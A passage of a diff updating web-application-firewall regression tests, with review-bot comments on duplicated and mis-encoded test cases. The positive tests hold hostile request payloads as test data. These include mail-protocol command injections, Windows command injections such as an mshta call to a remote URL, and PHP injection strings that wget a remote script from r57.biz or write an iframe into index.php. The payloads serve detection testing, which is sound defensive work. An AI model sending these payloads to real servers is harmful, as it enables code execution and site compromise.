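Review bot: Test 8 (hunk @@ -129,7 +136,8) is labelled `SMTP VRFY TO Command injection positive test` in the preceding hunk, yet its payload `%0d%0aRCPT%20TO%3A%3CPostmaster%3E` is identical to test 6's, so it duplicates the RCPT TO case and VRFY has no coverage at all. If 932300's pattern includes VRFY, point the test at it — VRFY takes a mailbox argument rather than `TO:`, so something like `uri: "/get?attackme=%0d%0aVRFY%20Postmaster"` together with `desc: "SMTP VRFY Command injection positive test"`; if VRFY is not in the rule, drop the test rather than keep a name that promises coverage it does not provide.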
@@ -50,7 +52,8 @@ tests: textarea=Hello%21%20World.%0adata%20not%20found. version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 4 desc: "SMTP QUIT Command injection positive test" stages: @@ -65,7 +68,8 @@ tests: uri: "/get?attackme=%0d%0aQUIT" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 5 desc: "SMTP Command QUIT Injection negative test" stages: @@ -82,7 +86,8 @@ tests: textarea=Hey%20please%20do%20not%20quit version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] - test_id: 6 desc: "SMTP HELP Command injection positive test" stages: @@ -97,7 +102,8 @@ tests: uri: "/get?attackme=%0d%0aHELP%20Postmaster" version: HTTP/1.0 output: - log_contains: id "932301" + log: + expect_ids: [932301] - test_id: 7 desc: "SMTP HELP Command Injection true negative test" stages: @@ -114,4 +120,5 @@ tests: textarea=Hello%21%20This%20text%20needs%20help%20now version: HTTP/1.0 output: - no_log_contains: id "932301" + log: + no_expect_ids: [932301] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml index e9e010ae2..12a1676a0 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml 
@@ -20,7 +20,8 @@ tests: textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 2 desc: "IMAP APPEND Command Injection negative test" stages: @@ -35,7 +36,8 @@ tests: uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 3 desc: "IMAP AUTHENTICATE Command injection positive test" stages: @@ -52,7 +54,8 @@ tests: textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 4 desc: "IMAP AUTHENTICATE Command Injection negative test" stages: @@ -67,7 +70,8 @@ tests: uri: "/get?text=Cannot%20authenticate%20anyways" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 5 desc: "IMAP STATUS Command injection positive test" # STATUS [a-zA-Z0-9\"\./%\*&]+? (?:\((UNSEEN|UIDNEXT|MESSAGES|UIDVALIDITY|RECENT| )+\))? @@ -85,7 +89,8 @@ tests: textarea=%0D%0Aa001%20STATUS%20INBOX%20(MESSAGES) version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 6 desc: "IMAP STATUS Command Injection negative test" stages: 
@@ -100,7 +105,8 @@ tests: uri: "/get?text=Please%20send%20me%20an%20update%20status%20all%20messages%20are%20being%20denied" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] - test_id: 7 desc: "IMAP UID Command injection positive test" # UID (COPY|FETCH|STORE) [0-9,:\*]+? @@ -118,7 +124,8 @@ tests: textarea=%0D%0Aa001%20uid%20store%20231%3A233%0D%0A version: HTTP/1.0 output: - log_contains: id "932310" + log: + expect_ids: [932310] - test_id: 8 desc: "IMAP UID Command Injection negative test" stages: @@ -133,4 +140,5 @@ tests: uri: "/get?text=The%20uid%20is%020not%020working" version: HTTP/1.0 output: - no_log_contains: id "932310" + log: + no_expect_ids: [932310] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml index 841205b7e..2ab494b9c 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932311.yaml @@ -18,7 +18,8 @@ tests: uri: "/get?attackme=%0d%0aa001%20EXAMINE%20INBOX" version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 2 desc: "IMAP CREATE/DELETE/EXAMINE/SELECT/SUBSCRIBE/UNSUBSCRIBE Command Injection true negative test" stages: @@ -34,7 +35,8 @@ tests: uri: "/get?text=We%examine%20this%20mail%20from%20Mars" version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 3 desc: "IMAP COPY Command Injection positive test" stages: @@ -51,7 +53,8 @@ tests: textarea=%0d%0aa002%20copy%202%3A4%20MEETING version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: 
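Review bot: The negative payload of 932311 test 2 (hunk @@ -34,7 +35,8) is `/get?text=We%examine%20this%20mail%20from%20Mars`; `%ex` is not a valid percent-escape, so instead of the intended space the request carries a malformed encoding. A negative test passes regardless of how that escape is handled, so it no longer demonstrates that 'examine' in clean prose is safe; fix it as `uri: "/get?text=We%20examine%20this%20mail%20from%20Mars"`. The same slip appears in 932310 test 8 on this line (hunk @@ -133,4 +140,5), `The%20uid%20is%020not%020working`, where `%02` decodes to a control byte followed by a literal `0`; presumably `%20not%20working` was meant.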
@@ -68,7 +71,8 @@ tests: textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: @@ -85,7 +89,8 @@ tests: textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: @@ -102,7 +107,8 @@ tests: textarea=We%20need%20the%20list%20%22ASAP%22 version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: @@ -119,7 +125,8 @@ tests: textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: @@ -136,7 +143,8 @@ tests: textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 version: HTTP/1.0 output: - no_log_contains: id "932311" + log: + no_expect_ids: [932311] - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: @@ -153,7 +161,8 @@ tests: textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: @@ -170,7 +179,8 @@ tests: textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 version: HTTP/1.0 output: - log_contains: id "932311" + log: + expect_ids: [932311] - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: 
@@ -187,7 +197,8 @@ tests:
textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22
version: HTTP/1.0
output:
- log_contains: id "932311"
+ log:
+ expect_ids: [932311]
- test_id: 12
desc: "IMAP SEARCH using CHARSET and range Command Injection positive test"
stages:
@@ -204,7 +215,8 @@ tests:
textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D
version: HTTP/1.0
output:
- log_contains: id "932311"
+ log:
+ expect_ids: [932311]
- test_id: 13
desc: "IMAP SEARCH Command Injection negative test"
stages:
@@ -221,4 +233,5 @@ tests:
textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive.
version: HTTP/1.0
output:
- no_log_contains: id "932311"
+ log:
+ no_expect_ids: [932311]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
index ac2fcaab7..248e5e706 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml
@@ -18,7 +18,8 @@ tests:
uri: "/get?attackme=%0d%0aRETR%20123"
version: HTTP/1.0
output:
- log_contains: id "932320"
+ log:
+ expect_ids: [932320]
- test_id: 2
desc: "POP3 RETR Command Injection negative test"
stages:
@@ -33,7 +34,8 @@ tests:
uri: "/get?text=Let%20me%20retrieve%2010%20of%20those"
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
- test_id: 3
desc: "POP3 DELE Command Injection negative test"
stages:
@@ -50,7 +52,8 @@ tests:
textarea=We%20should%20delete%20nine
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
- test_id: 4
desc: "POP3 LIST Command injection positive test"
stages:
@@ -65,7 +68,8 @@ tests:
uri: "/get?attackme=%0d%0alist%203"
version: HTTP/1.0
output:
- log_contains: id "932320"
+ log:
+ expect_ids: [932320]
- test_id: 5
desc: "POP3 LIST Command Injection negative test"
stages:
@@ -82,7 +86,8 @@ tests:
textarea=This%20text%20is%20a%20way%20of%20list%203%20things
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
- test_id: 6
desc: "POP3 TOP Command injection positive test"
stages:
@@ -97,7 +102,8 @@ tests:
uri: "/get?attackme=%0d%0aTOP%201%202"
version: HTTP/1.0
output:
- log_contains: id "932320"
+ log:
+ expect_ids: [932320]
- test_id: 7
desc: "POP3 TOP Command Injection true negative test"
stages:
@@ -114,7 +120,8 @@ tests:
textarea=These%20are%20top%10%20rules
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
- test_id: 8
desc: "POP3 AUTH Command injection positive test"
stages:
@@ -129,7 +136,8 @@ tests:
uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ="
version: HTTP/1.0
output:
- log_contains: id "932320"
+ log:
+ expect_ids: [932320]
- test_id: 9
desc: "POP3 AUTH Command Injection negative test"
stages:
@@ -146,7 +154,8 @@ tests:
textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please!
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
- test_id: 10
desc: "POP3 APOP Command injection positive test"
stages:
@@ -161,7 +170,8 @@ tests:
uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891"
version: HTTP/1.0
output:
- log_contains: id "932320"
+ log:
+ expect_ids: [932320]
- test_id: 11
desc: "POP3 APOP Command Injection negative test"
stages:
@@ -178,4 +188,5 @@ tests:
textarea=Look%2C%20apop%20star!
version: HTTP/1.0
output:
- no_log_contains: id "932320"
+ log:
+ no_expect_ids: [932320]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
index d5afc429e..81edbfea9 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml
@@ -18,7 +18,8 @@ tests:
uri: "/get?attackme=%0d%0aQUIT"
version: HTTP/1.0
output:
- log_contains: id "932321"
+ log:
+ expect_ids: [932321]
- test_id: 2
desc: "POP3 QUIT Command Injection negative test"
stages:
@@ -33,7 +34,8 @@ tests:
uri: "/get?text=Don't%20quit"
version: HTTP/1.0
output:
- no_log_contains: id "932321"
+ log:
+ no_expect_ids: [932321]
- test_id: 3
desc: "POP3 CAPA Command Injection negative test 2"
stages:
@@ -50,7 +52,8 @@ tests:
textarea=we%20do%20not%20have%20that%20capability
version: HTTP/1.0
output:
- no_log_contains: id "932321"
+ log:
+ no_expect_ids: [932321]
- test_id: 4
desc: "POP3 STAT Command Injection negative test"
stages:
@@ -67,7 +70,8 @@ tests:
textarea=Hi%20lestat!
version: HTTP/1.0
output:
- no_log_contains: id "932321"
+ log:
+ no_expect_ids: [932321]
- test_id: 5
desc: "POP3 NOOP Command injection negative test"
stages:
@@ -82,7 +86,8 @@ tests:
uri: "/get?attackme=%0aSeriously%2C%20noop"
version: HTTP/1.0
output:
- no_log_contains: id "932321"
+ log:
+ no_expect_ids: [932321]
- test_id: 6
desc: "POP3 RSET Command Injection negative test"
stages:
@@ -99,4 +104,5 @@ tests:
textarea=Someone%20bought%20this%20nice%20lerset
version: HTTP/1.0
output:
- no_log_contains: id "932321"
+ log:
+ no_expect_ids: [932321]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
index 5ddf01bf4..fb3b2d645 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml
@@ -18,4 +18,5 @@ tests:
uri: "/get?rce=!-1!-2"
version: HTTP/1.0
output:
- log_contains: id "932330"
+ log:
+ expect_ids: [932330]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
index c9e823dee..f147a23d5 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml
@@ -18,7 +18,8 @@ tests:
uri: "/get?rce=!1"
version: HTTP/1.0
output:
- log_contains: id "932331"
+ log:
+ expect_ids: [932331]
- test_id: 2
desc: "Unix shell history invocation: last command"
stages:
@@ -33,4 +34,5 @@ tests:
uri: "/get?rce=!!"
version: HTTP/1.0
output:
- log_contains: id "932331"
+ log:
+ expect_ids: [932331]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
index 7801af2f9..422afebd9 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml
@@ -19,7 +19,8 @@ tests:
uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey"
version: HTTP/1.0
output:
- log_contains: id "932370"
+ log:
+ expect_ids: [932370]
- test_id: 2
desc: "Windows Command Injection true negative test"
stages:
@@ -35,7 +36,8 @@ tests:
uri: "/get?cmd=regedit%20"
version: HTTP/1.0
output:
- no_log_contains: id "932370"
+ log:
+ no_expect_ids: [932370]
- test_id: 3
desc: "Windows Command Injection - bypass test"
stages:
@@ -51,7 +53,8 @@ tests:
uri: "/get?cmd=;%20mshta%20http://example.com"
version: HTTP/1.0
output:
- log_contains: id "932370"
+ log:
+ expect_ids: [932370]
- test_id: 4
desc: Windows Command Injection bypass with time negative test
stages:
@@ -68,4 +71,5 @@ tests:
uri: "/get?foo=time+warner+"
version: HTTP/1.1
output:
- no_log_contains: id "932370"
+ log:
+ no_expect_ids: [932370]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
index 322c01ee4..8e4ad88c2 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml
@@ -21,7 +21,8 @@ tests:
uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt"
version: HTTP/1.0
output:
- log_contains: id "932380"
+ log:
+ expect_ids: [932380]
- test_id: 2
desc: |
Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt
@@ -39,7 +40,8 @@ tests:
uri: "/get?view%3Dimage.jpg%26bcdboot%20%2Fr%20file.txt"
version: HTTP/1.0
output:
- log_contains: id "932380"
+ log:
+ expect_ids: [932380]
- test_id: 3
desc: |
Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot/r file.txt
@@ -57,7 +59,8 @@ tests:
uri: "/get?view%3Dimage.jpg%26bcdboot%2Fr%20file.txt"
version: HTTP/1.0
output:
- log_contains: id "932380"
+ log:
+ expect_ids: [932380]
- test_id: 4
desc: |
Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt
@@ -75,7 +78,8 @@ tests:
uri: "/get?view%3Dimage.jpg%26bcdboot%20%20%2Fr%20file.txt"
version: HTTP/1.0
output:
- log_contains: id "932380"
+ log:
+ expect_ids: [932380]
- test_id: 5
desc: |
Windows shell command injection with 'sort' (false positive): sort%3Dex%26sort%3Dascending
@@ -93,7 +97,8 @@ tests:
uri: "/get/www/delivery/lg.php?bannerid=18&campaignid=1&zoneid=4&loc=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Ddescending&referer=https%3A%2F%2Fwww.example.com%2Ffoo%2Fbar%2Fx-x%2Fx%3Fs%3D2014-11-01%26e%3D2020-10-31%26ex%3D7%26page%3D1%26sort%3Dex%26sort%3Dascending&cb=7de91ea349"
version: HTTP/1.0
output:
- no_log_contains: id "932380"
+ log:
+ no_expect_ids: [932380]
- test_id: 6
desc: |
Windows shell command injection with 'sort' (false positive): sort%3D0
@@ -111,7 +116,8 @@ tests:
uri: "/get/url%2Fbla%3Ftest%3D1%26sort%3D0"
version: HTTP/1.0
output:
- no_log_contains: id "932380"
+ log:
+ no_expect_ids: [932380]
- test_id: 7
desc: "Windows shell command injection using 'bcdboot'"
stages:
@@ -127,7 +133,8 @@ tests:
data: "var=test@coreruleset.org\"|bcdboot %SYSTEMROOT%\\win.ini"
version: HTTP/1.0
output:
- log_contains: id "932380"
+ log:
+ expect_ids: [932380]
- test_id: 8
desc: False positive against 'time warner'
stages:
@@ -144,7 +151,8 @@ tests:
uri: "/get?foo=time+warner+"
version: HTTP/1.1
output:
- no_log_contains: "id \"932380\""
+ log:
+ no_expect_ids: [932380]
- test_id: 9
desc: False positive against 'time for'
stages:
@@ -163,4 +171,5 @@ tests:
data: |
payload=While this is a challenging time for us all, we are busy helping customers manage playout infrastructure in ways that were just dreams only a couple of years ago.
output:
- no_log_contains: "id \"932380\""
+ log:
+ no_expect_ids: [932380]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
index edc0a1e83..5c935e1e7 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml
@@ -21,7 +21,8 @@ tests:
uri: "/get?foo=<?exec('wget%20http://r57.biz/r57.txt%20-O"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 2
desc: PHP Injection Attack (933100) from old modsec regressions
stages:
@@ -40,7 +41,8 @@ tests:
uri: "/get?foo=%3C%3Fphp%20echo(%5C%22KURWA%5C%22)%3B%20file_put_contents(%5C%22.%2Findex.php%5C%22%2C%20base64_decode(%5C%22Pz48aWZyYW1lIHNyYz0iaHR0cDovL3p1by5wb2Rnb3J6Lm9yZy96dW8vZWxlbi9pbmRleC5waHAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT48P3BocA%3D%3D%5C%22)%2C%20FILE_APPEND)%3B%20%3F%3E"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 3
desc: "PHP injection attack: looking for [/php] closing tag"
stages:
@@ -55,7 +57,8 @@ tests:
uri: "/get?foo=somePhpWouldGoHere%5B%2Fphp%5D"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 4
desc: 'PHP injection attack: looking for [\php] closing tag'
stages:
@@ -70,7 +73,8 @@ tests:
uri: "/get?foo=somePhpWouldGoHere%5B%5Cphp%5D"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 5
desc: |
xml/php polyglot payload, using a PHP
@@ -87,7 +91,8 @@ tests:
uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 6
desc: |
xml/php polyglot payload, using a PHP, uppercase test
@@ -104,7 +109,8 @@ tests:
uri: "/get?foo=%3C%3Fxml%20%3Aecho%201%3B"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 7
desc: |
xml/php polyglot payload, using a PHP
@@ -121,7 +127,8 @@ tests:
uri: "/get?foo=%3C%3Fxml%20%3AfputCSV%28%24alreadyOpenFile%2C%20array%28%22foo%22%2C%20%22bar%22%2C%20%22hello%22%2C%20%22world%22%29%29%3B"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
- test_id: 8
desc: |
xml/php polyglot payload, using a PHP
@@ -138,4 +145,5 @@ tests:
uri: "/get?foo=%3C%3Fxml%20%20%20%09%09%09%09%09%09%20%28%29%3Becho%201%3B"
version: HTTP/1.0
output:
- log_contains: id "933100"
+ log:
+ expect_ids: [933100]
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
index 97afabe4a..c0aba7cb6 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933110.yaml
@@ -16,7 +16,8 @@ tests:
uri: /
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
- test_id: 2
desc: PHP .php upload
stages:
@@ -31,7 +32,8 @@ tests:
uri: /upload1
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 3
desc: PHP .php upload in X_Filename
stages:
@@ -46,7 +48,8 @@ tests:
uri: /upload2
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 4
desc: PHP .php upload in X-File-Name
stages:
@@ -61,7 +64,8 @@ tests:
uri: /upload3
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 5
desc: PHP .php.. upload
stages:
@@ -76,7 +80,8 @@ tests:
uri: /upload4
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 6
desc: PHP .phtml upload
stages:
@@ -91,7 +96,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 7
desc: PHP .phtml...... upload in X-File-Name
stages:
@@ -106,7 +112,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 8
desc: PHP .php5 upload in X-File-Name
stages:
@@ -121,7 +128,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 9
desc: PHP .php5 upload in X-File-Name
stages:
@@ -136,7 +144,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 10
desc: PHP .php7 upload in X-File-Name
stages:
@@ -151,7 +160,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 11
desc: PHP no file upload
stages:
@@ -165,7 +175,8 @@ tests:
uri: /
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
- test_id: 12
desc: PHP php5... upload
stages:
@@ -180,7 +191,8 @@ tests:
uri: /upload5
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 13
desc: PHP php5... upload in X_Filename
stages:
@@ -195,7 +207,8 @@ tests:
uri: /upload6
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 14
desc: PHP .php. upload in X_Filename
stages:
@@ -210,7 +223,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 15
desc: PHP sfewfda.php............. upload
stages:
@@ -225,7 +239,8 @@ tests:
uri: /upload8
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 16
desc: PHP script uploads
stages:
@@ -240,7 +255,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 17
desc: PHP .php907............. upload
stages:
@@ -255,7 +271,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 18
desc: PHP .phtml upload
stages:
@@ -270,7 +287,8 @@ tests:
uri: /upload
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 19
desc: PHP .phtml987... upload passes in X_Filename
stages:
@@ -285,7 +303,8 @@ tests:
uri: /
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
- test_id: 20
desc: PHP .php upload
stages:
@@ -300,7 +319,8 @@ tests:
uri: /upload2
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 21
desc: PHP .php5... upload
stages:
@@ -315,7 +335,8 @@ tests:
uri: /upload6
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 22
desc: PHP .php. upload
stages:
@@ -330,7 +351,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 23
desc: PHP .phtml987... upload passes in X.Filename
stages:
@@ -345,7 +367,8 @@ tests:
uri: /
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
- test_id: 24
desc: PHP .phar upload
stages:
@@ -360,7 +383,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 25
desc: PHP .phps upload
stages:
@@ -375,7 +399,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 26
desc: PHP .pht upload
stages:
@@ -390,7 +415,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 27
desc: PHP .phpt upload
stages:
@@ -405,7 +431,8 @@ tests:
uri: /upload7
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 28
desc: PHP upload via multipart
stages:
@@ -428,7 +455,8 @@ tests:
----------397236876--
version: "HTTP/1.1"
output:
- log_contains: id "933110"
+ log:
+ expect_ids: [933110]
- test_id: 29
desc: PHP upload via multipart should pass
stages:
@@ -451,7 +479,8 @@ tests:
----------397236876--
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
- test_id: 30
desc: PHP upload via multipart should pass
stages:
@@ -474,4 +503,5 @@ tests:
----------397236876--
version: "HTTP/1.1"
output:
- no_log_contains: id "933110"
+ log:
+ no_expect_ids: [933110]
